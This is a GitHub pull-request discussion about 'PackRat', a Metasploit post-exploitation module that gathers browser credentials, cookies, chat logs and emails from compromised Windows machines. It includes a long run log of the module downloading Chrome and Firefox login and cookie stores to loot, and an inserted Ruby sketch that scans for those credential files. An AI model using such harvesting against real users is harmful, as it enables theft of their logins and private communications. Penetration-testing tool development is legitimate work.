
Add 'PackRat' post exploitation module -- gathers many end user application artefacts #5433

Closed
wants to merge 4 commits into from

Conversation

@cliffe commented May 28, 2015

This post exploitation module has an extensive list of artefacts that it can gather from applications on end user systems.

Artefacts include: chat logins and logs, browser logins and history and cookies, email logins and emails sent and received and deleted, contacts, and many others. These artefacts are collected from applications including: 12 browsers, 13 chat/IM/IRC applications, 6 email clients, and 1 game.

The use case for this post-exploitation module is to specify the types of artefacts you are interested in, to gather the relevant files depending on your aims.

Show options illustrates the many kinds of information that can be selectively gathered.
[screenshot: show options]

So for example, to gather all database files from Viber:
[screenshots: choose set options; choose]

Gathering everything is also an option:
[screenshots: run_all ... end_all]

Loot!
[screenshot: saved to loot]

This module was developed by Barwar Salim M for his final year project at Leeds Beckett University. Guidance, code clean-up and some additions by Z. Cliffe Schreuders.

We believe that this module will substantially increase the post-exploitation information gathering coverage for files of interest on end user systems.

@kernelsmith (Contributor)

Cool stuff! I think you want "artifacts" however vs "artefacts". Additionally, can you confirm or point to any licensing information? Don't want to get in trouble! ;)

@cliffe (Author) commented May 29, 2015

Hi @kernelsmith,

The code has been updated to use the US spelling.

We can confirm the code is released under the Metasploit Framework License (MSF_LICENSE and/or BSD_LICENSE).

Thanks.

@kernelsmith (Contributor)

Ah, I wasn't sure if it was a regional thing or not because both spellings were used. Thanks!

@@ -0,0 +1,918 @@
##
# This module requires Metasploit: http//metasploit.com/download
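Review bot: the URL in the header comment is missing the colon after the scheme (`http//metasploit.com/download`), which is why msftidy reports "Invalid URL" for this file; change it to `# This module requires Metasploit: http://metasploit.com/download` so the standard header check passes.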
Contributor

$ tools/msftidy.rb modules/post/windows/gather/enum_application_artifacts_packrat.rb
modules/post/windows/gather/enum_application_artifacts_packrat.rb - [INFO] Invalid URL: # This module requires Metasploit: http//metasploit.com

@jvazquez-r7 (Contributor)

I honestly feel like this is too verbose:

msf post(enum_application_artifacts_packrat) > run


PackRat is searching and gathering...

Filtering based on these selections:

    APPCATEGORY: All, APPLICATION: All, ARTIFACTS: All

[*] Searching for Incredimail's Msg.iml files in Administrator's user directory...
[-] Incredimail's Msg.iml not found in Administrator's user directory

[*] Searching for Outlook's Deleted items.dbx files in Administrator's user directory...
[-] Outlook's Deleted items.dbx not found in Administrator's user directory

[*] Searching for Outlook's Drafts.dbx files in Administrator's user directory...
[-] Outlook's Drafts.dbx not found in Administrator's user directory

[*] Searching for Outlook's Folders.dbx files in Administrator's user directory...
[-] Outlook's Folders.dbx not found in Administrator's user directory

[*] Searching for Outlook's Inbox.dbx files in Administrator's user directory...
[-] Outlook's Inbox.dbx not found in Administrator's user directory

[*] Searching for Outlook's Offline.dbx files in Administrator's user directory...
[-] Outlook's Offline.dbx not found in Administrator's user directory

[*] Searching for Outlook's Outbox.dbx files in Administrator's user directory...
[-] Outlook's Outbox.dbx not found in Administrator's user directory

[*] Searching for Outlook's Sent items.dbx files in Administrator's user directory...
[-] Outlook's Sent items.dbx not found in Administrator's user directory

[*] Searching for Operamail's Wand.dat files in Administrator's user directory...
[-] Operamail's Wand.dat not found in Administrator's user directory

[*] Searching for Operamail's *.mbs files in Administrator's user directory...
[-] Operamail's *.mbs not found in Administrator's user directory

[*] Searching for Postbox's Inbox files in Administrator's user directory...
[-] Postbox's Inbox not found in Administrator's user directory

[*] Searching for Postbox's Sent* files in Administrator's user directory...
[-] Postbox's Sent* not found in Administrator's user directory

[*] Searching for Postbox's *.msf files in Administrator's user directory...
[-] Postbox's *.msf not found in Administrator's user directory

[*] Searching for Postbox's Archive.msf files in Administrator's user directory...
[-] Postbox's Archive.msf not found in Administrator's user directory

[*] Searching for Postbox's Bulk mail.msf files in Administrator's user directory...
[-] Postbox's Bulk mail.msf not found in Administrator's user directory

[*] Searching for Postbox's Draft.msf files in Administrator's user directory...
[-] Postbox's Draft.msf not found in Administrator's user directory

[*] Searching for Postbox's Inbox.msf files in Administrator's user directory...
[-] Postbox's Inbox.msf not found in Administrator's user directory

[*] Searching for Postbox's Sent*.msf files in Administrator's user directory...
[-] Postbox's Sent*.msf not found in Administrator's user directory

[*] Searching for Postbox's Sent.msf files in Administrator's user directory...
[-] Postbox's Sent.msf not found in Administrator's user directory

[*] Searching for Postbox's Templates.msf files in Administrator's user directory...
[-] Postbox's Templates.msf not found in Administrator's user directory

[*] Searching for Postbox's Trash.msf files in Administrator's user directory...
[-] Postbox's Trash.msf not found in Administrator's user directory

[*] Searching for Thunderbird's Signons.sqlite files in Administrator's user directory...
[-] Thunderbird's Signons.sqlite not found in Administrator's user directory

[*] Searching for Thunderbird's Key3.db files in Administrator's user directory...
[-] Thunderbird's Key3.db not found in Administrator's user directory

[*] Searching for Thunderbird's Cert8.db files in Administrator's user directory...
[-] Thunderbird's Cert8.db not found in Administrator's user directory

[*] Searching for Thunderbird's Inbox files in Administrator's user directory...
[-] Thunderbird's Inbox not found in Administrator's user directory

[*] Searching for Thunderbird's Sent files in Administrator's user directory...
[-] Thunderbird's Sent not found in Administrator's user directory

[*] Searching for Thunderbird's Trash files in Administrator's user directory...
[-] Thunderbird's Trash not found in Administrator's user directory

[*] Searching for Thunderbird's Drafts files in Administrator's user directory...
[-] Thunderbird's Drafts not found in Administrator's user directory

[*] Searching for Thunderbird's Global-messages-db.sqlite files in Administrator's user directory...
[-] Thunderbird's Global-messages-db.sqlite not found in Administrator's user directory

[*] Searching for Windowlivemail's *.oeaccount files in Administrator's user directory...
[*] Windowlivemail's *.oeaccount file found
[*] Searching for Aim's Aimx.bin files in Administrator's user directory...
[-] Aim's Aimx.bin not found in Administrator's user directory

[*] Searching for Aim's *.html files in Administrator's user directory...
[-] Aim's *.html not found in Administrator's user directory

[*] Searching for Digsby's Logininfo.yaml files in Administrator's user directory...
[-] Digsby's Logininfo.yaml not found in Administrator's user directory

[*] Searching for Gadugadu's Thumbs.db files in Administrator's user directory...
[-] Gadugadu's Thumbs.db not found in Administrator's user directory

[*] Searching for Gadugadu's Profile.ini files in Administrator's user directory...
[-] Gadugadu's Profile.ini not found in Administrator's user directory

[*] Searching for Icq's Owner.mdb files in Administrator's user directory...
[-] Icq's Owner.mdb not found in Administrator's user directory

[*] Searching for Icq's Messages.mdb files in Administrator's user directory...
[-] Icq's Messages.mdb not found in Administrator's user directory

[*] Searching for Miranda's Home.dat files in Administrator's user directory...
[-] Miranda's Home.dat not found in Administrator's user directory

[*] Searching for Nimbuzz's Nimbuzz.log files in Administrator's user directory...
[-] Nimbuzz's Nimbuzz.log not found in Administrator's user directory

[*] Searching for Pidgen's Accounts.xml files in Administrator's user directory...
[-] Pidgen's Accounts.xml not found in Administrator's user directory

[*] Searching for Pidgen's *.html files in Administrator's user directory...
[-] Pidgen's *.html not found in Administrator's user directory

[*] Searching for Qq's Userheadtemp* files in Administrator's user directory...
[-] Qq's Userheadtemp* not found in Administrator's user directory

[*] Searching for Skype's Main.db files in Administrator's user directory...
[-] Skype's Main.db not found in Administrator's user directory

[*] Searching for Tango's Contacts.dat files in Administrator's user directory...
[-] Tango's Contacts.dat not found in Administrator's user directory

[*] Searching for Tango's Install.log files in Administrator's user directory...
[-] Tango's Install.log not found in Administrator's user directory

[*] Searching for Tlen.pl's Profiles.dat files in Administrator's user directory...
[-] Tlen.pl's Profiles.dat not found in Administrator's user directory

[*] Searching for Tlen.pl's *.jpg files in Administrator's user directory...
[-] Tlen.pl's *.jpg not found in Administrator's user directory

[*] Searching for Trillian's Accounts.ini files in Administrator's user directory...
[-] Trillian's Accounts.ini not found in Administrator's user directory

[*] Searching for Trillian's *.log files in Administrator's user directory...
[-] Trillian's *.log not found in Administrator's user directory

[*] Searching for Viber's Viber.db files in Administrator's user directory...
[-] Viber's Viber.db not found in Administrator's user directory

[*] Searching for Viber's Thumbs.db files in Administrator's user directory...
[-] Viber's Thumbs.db not found in Administrator's user directory

[*] Searching for Viber's *.jpg files in Administrator's user directory...
[-] Viber's *.jpg not found in Administrator's user directory

[*] Searching for Xchat's *.txt files in Administrator's user directory...
[-] Xchat's *.txt not found in Administrator's user directory

[*] Searching for Xfire's Xfireuser.ini files in Administrator's user directory...
[-] Xfire's Xfireuser.ini not found in Administrator's user directory

[*] Searching for Xfire's Xfireuser.ini files in Administrator's user directory...
[-] Xfire's Xfireuser.ini not found in Administrator's user directory

[*] Searching for Avant's Forms.dat files in Administrator's user directory...
[-] Avant's Forms.dat not found in Administrator's user directory

[*] Searching for Comodo's Login data files in Administrator's user directory...
[-] Comodo's Login data not found in Administrator's user directory

[*] Searching for Comodo's Cookies files in Administrator's user directory...
[-] Comodo's Cookies not found in Administrator's user directory

[*] Searching for Comodo's History files in Administrator's user directory...
[-] Comodo's History not found in Administrator's user directory

[*] Searching for Comodo's Visited links files in Administrator's user directory...
[-] Comodo's Visited links not found in Administrator's user directory

[*] Searching for Coolnovo's Login data files in Administrator's user directory...
[-] Coolnovo's Login data not found in Administrator's user directory

[*] Searching for Chrome's Login data files in Administrator's user directory...
[*] Chrome's Login data file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
[*] Chrome Login data downloaded (Chrome's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163908_default_172.16.158.133_chromeLoginData_011328.bin

[*] Searching for Chrome's Cookies files in Administrator's user directory...
[*] Chrome's Cookies file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies
[*] Chrome Cookies downloaded (Chrome Cookies)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163909_default_172.16.158.133_chromeCookies_006520.bin

[*] Searching for Chrome's History files in Administrator's user directory...
[*] Chrome's History file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History
[*] Chrome History downloaded (Chrome History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163911_default_172.16.158.133_chromeHistory_013030.bin

[*] Searching for Firefox's Logins.json files in Administrator's user directory...
[*] Firefox's Logins.json file found
[*] Searching for Firefox's Cert8.db files in Administrator's user directory...
[*] Firefox's Cert8.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cert8.db
[*] Firefox Cert8.db downloaded (Firefox's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163913_default_172.16.158.133_firefoxcert8.db_463486.db

[*] Searching for Firefox's Key3.db files in Administrator's user directory...
[*] Firefox's Key3.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\key3.db
[*] Firefox Key3.db downloaded (Firefox's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163914_default_172.16.158.133_firefoxkey3.db_051687.db

[*] Searching for Firefox's Places.sqlite files in Administrator's user directory...
[*] Firefox's Places.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\places.sqlite
[*] Firefox Places.sqlite downloaded (FireFox History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163915_default_172.16.158.133_firefoxplaces.sq_278232.bin

[*] Searching for Firefox's Formhistory.sqlite files in Administrator's user directory...
[*] Firefox's Formhistory.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\formhistory.sqlite
[*] Firefox Formhistory.sqlite downloaded (FireFox's saved Username using sqlite tool)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163942_default_172.16.158.133_firefoxformhisto_630372.bin

[*] Searching for Firefox's Cookies.sqlite files in Administrator's user directory...
[*] Firefox's Cookies.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cookies.sqlite
[*] Firefox Cookies.sqlite downloaded (Firefox's cookies)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163943_default_172.16.158.133_firefoxcookies.s_492178.bin

[*] Searching for Flock's Formhistory.sqlite files in Administrator's user directory...
[-] Flock's Formhistory.sqlite not found in Administrator's user directory

[*] Searching for Flock's Downloads.sqlite files in Administrator's user directory...
[-] Flock's Downloads.sqlite not found in Administrator's user directory

[*] Searching for Flock's Cookies.sqlite files in Administrator's user directory...
[-] Flock's Cookies.sqlite not found in Administrator's user directory

[*] Searching for Ie's Index.dat files in Administrator's user directory...
[*] Ie's Index.dat file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
[*] Ie Index.dat downloaded (IE's History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163947_default_172.16.158.133_IEindex.dat_939180.dat

[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012015060520150606\index.dat
[*] Ie Index.dat downloaded (IE's History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163948_default_172.16.158.133_IEindex.dat_002048.dat

[*] Searching for K-meleon's Signons.sqlite files in Administrator's user directory...
[-] K-meleon's Signons.sqlite not found in Administrator's user directory

[*] Searching for K-meleon's Key3.db files in Administrator's user directory...
[-] K-meleon's Key3.db not found in Administrator's user directory

[*] Searching for K-meleon's Cert8.db files in Administrator's user directory...
[-] K-meleon's Cert8.db not found in Administrator's user directory

[*] Searching for K-meleon's Cookies.sqlite files in Administrator's user directory...
[-] K-meleon's Cookies.sqlite not found in Administrator's user directory

[*] Searching for K-meleon's Formhistory.sqlite files in Administrator's user directory...
[-] K-meleon's Formhistory.sqlite not found in Administrator's user directory

[*] Searching for K-meleon's Places.sqlite files in Administrator's user directory...
[-] K-meleon's Places.sqlite not found in Administrator's user directory

[*] Searching for Maxthon's Magicfill2.dat files in Administrator's user directory...
[-] Maxthon's Magicfill2.dat not found in Administrator's user directory

[*] Searching for Opera's Login data files in Administrator's user directory...
[-] Opera's Login data not found in Administrator's user directory

[*] Searching for Opera's Cookies files in Administrator's user directory...
[-] Opera's Cookies not found in Administrator's user directory

[*] Searching for Opera's Visited links files in Administrator's user directory...
[-] Opera's Visited links not found in Administrator's user directory

[*] Searching for Srware's Login data files in Administrator's user directory...
[-] Srware's Login data not found in Administrator's user directory

[*] Searching for Srware's Cookies files in Administrator's user directory...
[-] Srware's Cookies not found in Administrator's user directory

[*] Searching for Srware's History files in Administrator's user directory...
[-] Srware's History not found in Administrator's user directory

[*] Searching for Safari's Keychain.plist files in Administrator's user directory...
[-] Safari's Keychain.plist not found in Administrator's user directory

[*] Searching for Seamonkey's Logins.json files in Administrator's user directory...
[*] Seamonkey's Logins.json file found
[*] Searching for Seamonkey's Cert8.db files in Administrator's user directory...
[*] Seamonkey's Cert8.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cert8.db
[*] Seamonkey Cert8.db downloaded (SeaMonkey's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163950_default_172.16.158.133_seamonkeycert8.d_495747.db

[*] Searching for Seamonkey's Key3.db files in Administrator's user directory...
[*] Seamonkey's Key3.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\key3.db
[*] Seamonkey Key3.db downloaded (SeaMonkey's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163952_default_172.16.158.133_seamonkeykey3.db_483327.db

[*] Searching for Seamonkey's Formhistory.sqlite files in Administrator's user directory...
[*] Seamonkey's Formhistory.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\formhistory.sqlite
[*] Seamonkey Formhistory.sqlite downloaded (SeaMonkey's saved Username)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163953_default_172.16.158.133_seamonkeyformhis_648970.bin

[*] Searching for Seamonkey's Places.sqlite files in Administrator's user directory...
[*] Seamonkey's Places.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\places.sqlite
[*] Seamonkey Places.sqlite downloaded (SeaMonkey History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163955_default_172.16.158.133_seamonkeyplaces._326537.bin

[*] Searching for Seamonkey's Cookies.sqlite files in Administrator's user directory...
[*] Seamonkey's Cookies.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cookies.sqlite
[*] Seamonkey Cookies.sqlite downloaded (SeaMonkey's cookies)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626164021_default_172.16.158.133_seamonkeycookies_970800.bin

[*] Downloaded 15 artifact(s), attempted 94.

[*] Post module execution completed

What about being less verbose by default, for example switching to "vprint". I feel like being less verbose by default and showing just a summary table at the end would look better.
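As an added illustration of the review suggestion above (example code, not from the PR or from Metasploit): a stand-alone Ruby sketch of the APPCATEGORY / APPLICATION / ARTIFACTS filtering the description shows, with the per-item "searching" / "not found" lines gated behind a verbose flag (the role `vprint_status` plays in a real module) and a summary table produced once at the end. The catalogue entries, their globs, the `demo` helper and the constructed directory layout are assumptions for this example.

```ruby
require 'tmpdir'
require 'fileutils'

# Constructed catalogue in the shape the module's options imply: each entry has
# an application category, an application, an artifact name and a glob relative
# to the user directory. Names are taken from the PR thread; the globs are
# assumptions for this example only.
ARTIFACT_CATALOGUE = [
  { category: 'browsers', app: 'chrome',      artifact: 'Login data', glob: 'Google/Chrome/User Data/Default/Login Data' },
  { category: 'browsers', app: 'firefox',     artifact: 'Key3.db',    glob: 'Mozilla/Firefox/Profiles/*/key3.db' },
  { category: 'chats',    app: 'viber',       artifact: 'Viber.db',   glob: 'Viber/**/viber.db' },
  { category: 'emails',   app: 'thunderbird', artifact: 'Inbox',      glob: 'Thunderbird/Profiles/*/Mail/*/Inbox' }
].freeze

# Mirror of the APPCATEGORY / APPLICATION / ARTIFACTS options shown in the PR:
# 'All' matches everything, any other value matches case-insensitively.
def select_artifacts(catalogue, category: 'All', application: 'All', artifacts: 'All')
  catalogue.select do |e|
    [[category, e[:category]], [application, e[:app]], [artifacts, e[:artifact]]].all? do |want, have|
      want.casecmp?('All') || want.casecmp?(have)
    end
  end
end

# Hypothetical scanner in the quieter style the reviewer asked for: per-item
# "searching" / "not found" lines are emitted only when verbose (what vprint_status
# would do in a real module); hits are always reported; structured results are
# returned so a summary can be printed once at the end.
def scan_user_dir(user_dir, selection, verbose: false, log: [])
  selection.map do |e|
    log << "[*] Searching for #{e[:app]}'s #{e[:artifact]}..." if verbose
    matches = Dir.glob(File.join(user_dir, e[:glob]))
    if matches.empty?
      log << "[-] #{e[:app]}'s #{e[:artifact]} not found" if verbose
    else
      log << "[+] #{e[:app]}'s #{e[:artifact]} found (#{matches.size})"
    end
    { app: e[:app], artifact: e[:artifact], found: matches.size }
  end
end

# The summary table suggested in review, instead of one pair of lines per artifact.
def summary_table(results)
  header = ['App', 'Artifact', 'Found']
  rows = results.map { |r| [r[:app], r[:artifact], r[:found].to_s] }
  widths = header.each_index.map { |i| ([header[i]] + rows.map { |r| r[i] }).map(&:length).max }
  fmt = ->(cols) { cols.each_with_index.map { |c, i| c.ljust(widths[i]) }.join('  ') }
  ([fmt.call(header), fmt.call(widths.map { |w| '-' * w })] + rows.map { |r| fmt.call(r) }).join("\n")
end

# Build a constructed user directory containing two of the catalogued artifacts,
# scan it with the chosen filter and return [results, log].
def demo(category: 'All', application: 'All', artifacts: 'All', verbose: false)
  Dir.mktmpdir('packrat-demo') do |dir|
    ['Google/Chrome/User Data/Default/Login Data',
     'Mozilla/Firefox/Profiles/abc.default/key3.db'].each do |rel|
      FileUtils.mkdir_p(File.dirname(File.join(dir, rel)))
      File.write(File.join(dir, rel), 'constructed sample content')
    end
    log = []
    selection = select_artifacts(ARTIFACT_CATALOGUE, category: category, application: application, artifacts: artifacts)
    [scan_user_dir(dir, selection, verbose: verbose, log: log), log]
  end
end

if __FILE__ == $PROGRAM_NAME
  results, log = demo
  puts log, '', summary_table(results)
end
```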

@jvazquez-r7 (Contributor)

Since it has been more than a month since the last review and there has not been any answer, I'm going to move this module to unstable at the moment. @cliffe feel free to reopen if at any moment you would like to finish the review in order to merge it into rapid7/master. Thanks!

@jvazquez-r7 jvazquez-r7 self-assigned this Jul 31, 2015
jvazquez-r7 added a commit to jvazquez-r7/metasploit-framework that referenced this pull request Aug 1, 2015
jvazquez-r7 added a commit that referenced this pull request Aug 1, 2015
* Close #5433 by moving the module to unstable
@jvazquez-r7 (Contributor)

@cliffe #5798 has moved the module in this PR to the unstable branch. Feel free to open a new PR once you're ready to finish the review in order to land into rapid7/master. Thanks!

@jvazquez-r7 jvazquez-r7 closed this Aug 1, 2015
@cliffe (Author) commented Aug 1, 2015

Thanks for the code review and sorry for the delay. I will get to this in the next couple of weeks and push the changes. @jvazquez-r7, can I push to this branch/pull request, to keep all the comments and review, or do I have to start a new pull request (losing the above context for changes)?

This pull request was closed.